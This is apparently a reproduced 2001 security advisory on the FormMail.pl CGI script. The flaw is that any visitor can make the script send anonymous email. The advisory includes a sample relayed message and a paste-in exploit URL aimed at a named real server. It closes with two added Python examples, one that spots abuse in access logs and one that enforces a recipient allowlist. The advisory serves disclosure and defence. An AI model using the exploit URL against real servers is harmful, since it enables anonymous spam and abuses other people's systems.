COMMAND

    FormMail.pl

SYSTEMS AFFECTED

    FormMail

PROBLEM

    Michael Rawls found the following.  He did a little playing with
    FormMail.pl after a run-in with a spammer abusing his web server.
    Apparently ALL FormMail.pl cgi-bin scripts can be used to send spam
    anonymously.  He found another server running FormMail.pl, tried
    the same exploit to send himself an email, and it worked.

    The email will not show the spammer's real IP; only the web
    server's IP will show.  The web server's logs will, however, show
    the true IP address of the spammer.

    An actual example of the email that was sent:

        Return-Path: <apache@hum.auc.dk>
        Received: from hercules.humfak.auc.dk (hercules.humfak.auc.dk [130.225.58.9])
                by mail.dancris.com (8.9.3/8.9.3) with ESMTP id RAA14431
                for <spam-l@shadowstorm.com>; Sat, 10 Mar 2001 17:19:34 -0700
        Received: from apache by hercules.humfak.auc.dk with local (Exim 3.02 #8)
                id 14bta3-0004tP-00
                for spam-l@shadowstorm.com; Sun, 11 Mar 2001 01:19:27 +0100
        To: spam-l@shadowstorm.com
        From: ()
        Subject: WWW Form Submission
        Message-Id: <E14bta3-0004tP-00@hercules.humfak.auc.dk>
        Date: Sun, 11 Mar 2001 01:19:27 +0100
        X-UIDL: TPj"!bg3"!i:T!!=FU"!

        Below is the result of your feedback form.  It was submitted by
        () on Sunday, March 11, 2001 at 01:19:27
        ---------------------------------------------------------------------------

        message: Proof that FormMail.pl can be used to send anonymous spam.

        ---------------------------------------------------------------------------

    Paste the line below into your web browser's URL box as one long
    single line, insert your email address in place of
    "email@address-to-spam.com", and press enter.  Now go check your
    email:

        http://www.hum.auc.dk/cgi-bin/FormMail.pl?recipient=email@address-to-spam.com&message=Proof%20that%20FormMail.pl%20can%20be%20used%20to%20send%20anonymous%20spam

    The address "www.hum.auc.dk" can be replaced with the address of
    ANY web server set up to use FormMail.pl.
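    Since the true client address survives only in the web server's
    access log, that log is where an operator can spot this abuse.  The
    following is an added example (not part of the advisory and not
    FormMail code) that reads Apache-style common-log-format lines,
    picks out requests to FormMail.pl, and reports the client IPs that
    named a "recipient" outside the site's own domains.  The log lines,
    IP addresses, hostnames and domains are constructed for the example;
    only GET requests carry the recipient in the logged URL, so POSTed
    submissions are listed but cannot be attributed to a recipient from
    the access log alone.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in Apache common log format.
# IPs, timestamps and addresses are made up for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Mar/2001:01:19:27 +0100] "GET /cgi-bin/FormMail.pl?recipient=victim@example.net&message=hello HTTP/1.0" 200 512
198.51.100.22 - - [11/Mar/2001:01:20:02 +0100] "GET /index.html HTTP/1.0" 200 2048
203.0.113.7 - - [11/Mar/2001:01:21:44 +0100] "POST /cgi-bin/FormMail.pl HTTP/1.0" 200 512
203.0.113.7 - - [11/Mar/2001:01:22:10 +0100] "GET /cgi-bin/FormMail.pl?recipient=other@example.org&message=hi HTTP/1.0" 200 512
192.0.2.5 - - [11/Mar/2001:01:25:00 +0100] "GET /cgi-bin/FormMail.pl?recipient=webmaster@example.com&message=contact HTTP/1.0" 200 512
"""

# client ip, two ignored fields, [timestamp], "METHOD target PROTOCOL", status, size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_formmail_requests(log_text):
    """Yield (ip, timestamp, method, recipients) for every request to FormMail.pl.

    'recipients' is the list of values of the recipient= query parameter;
    it is empty for POST requests because the body is not logged.
    """
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        parts = urlsplit(m.group("target"))
        if not parts.path.lower().endswith("/formmail.pl"):
            continue
        recipients = parse_qs(parts.query).get("recipient", [])
        yield m.group("ip"), m.group("ts"), m.group("method"), recipients


def suspicious_sources(log_text, own_domains):
    """Return {client_ip: {recipient, ...}} for requests whose recipient
    is outside the domains this form is supposed to deliver to."""
    own = {d.lower() for d in own_domains}
    hits = defaultdict(set)
    for ip, _ts, _method, recipients in parse_formmail_requests(log_text):
        for addr in recipients:
            domain = addr.rpartition("@")[2].lower()
            if domain not in own:
                hits[ip].add(addr)
    return dict(hits)


if __name__ == "__main__":
    for ip, addrs in suspicious_sources(SAMPLE_LOG, ["example.com"]).items():
        print(ip, sorted(addrs))
```

    Run against a real log, feed the file's contents in place of
    SAMPLE_LOG and list the domains the form legitimately delivers to;
    any client IP that appears in the result is a candidate for blocking
    at the web server while the script is patched.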

SOLUTION

    A patched version of Matt Wright's FormMail.pl is now available.
    Parameshwar Babu has released a patched version of the FormMail
    script that fixes this security hole.  The modified script lets you
    specify the list of permitted recipient email addresses in a text
    file, so the script can be restricted to send email only to
    authorized addresses.  The patched script can be downloaded from

        http://www.mailvalley.com/formmail/
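    The recipient allowlist described above is the core of the fix:
    whatever the request asks for, the script only ever delivers to
    addresses that the site operator listed in a file.  The following is
    an added example (not the patched script from mailvalley.com, and
    not FormMail code) showing that check in Python: the allowlist is
    read from a text file, the "recipient" parameter is split on commas
    as FormMail does, and anything not on the list is dropped, so a
    request naming an outside address yields no recipients and nothing
    is sent.  The file contents, URLs and addresses are constructed for
    the example.

```python
import os
import tempfile
from urllib.parse import urlsplit, parse_qs


def load_allowed_recipients(path):
    """Read one address per line; blank lines and '#' comments are ignored.
    Addresses are lower-cased so the later comparison is case-insensitive."""
    allowed = set()
    with open(path, encoding="utf-8") as fh:
        for raw in fh:
            line = raw.strip()
            if line and not line.startswith("#"):
                allowed.add(line.lower())
    return allowed


def select_recipients(requested, allowed):
    """Keep only requested addresses that appear in the allowlist.

    FormMail accepts a comma-separated list in the recipient field, so each
    field is split on commas; duplicates are removed, order is preserved.
    """
    chosen = []
    for field in requested:
        for addr in field.split(","):
            addr = addr.strip().lower()
            if addr in allowed and addr not in chosen:
                chosen.append(addr)
    return chosen


def recipients_from_url(url, allowed):
    """Apply the allowlist to the recipient= parameter of a FormMail-style
    URL.  An empty result means the script should refuse to send."""
    query = parse_qs(urlsplit(url).query)
    return select_recipients(query.get("recipient", []), allowed)


def demo():
    # Constructed allowlist file; in a real deployment it lives outside
    # the web root so it cannot be fetched or replaced over HTTP.
    contents = (
        "# addresses this form is allowed to deliver to\n"
        "webmaster@example.com\n"
        "Sales@Example.com\n"
    )
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False,
                                     encoding="utf-8") as fh:
        fh.write(contents)
        path = fh.name
    try:
        allowed = load_allowed_recipients(path)
    finally:
        os.unlink(path)

    # Constructed requests: one naming an outside address, one mixing a
    # listed address with an unlisted one.
    abuse = ("http://form.example.com/cgi-bin/FormMail.pl"
             "?recipient=email@address-to-spam.com&message=x")
    mixed = ("http://form.example.com/cgi-bin/FormMail.pl"
             "?recipient=sales@example.com,outsider@example.net&message=x")
    return recipients_from_url(abuse, allowed), recipients_from_url(mixed, allowed)


if __name__ == "__main__":
    print(demo())
```

    The point of loading the list from a file rather than from the
    request is that the client controls every form field, so nothing in
    the submission can be trusted to name the destination; only the
    operator's file can.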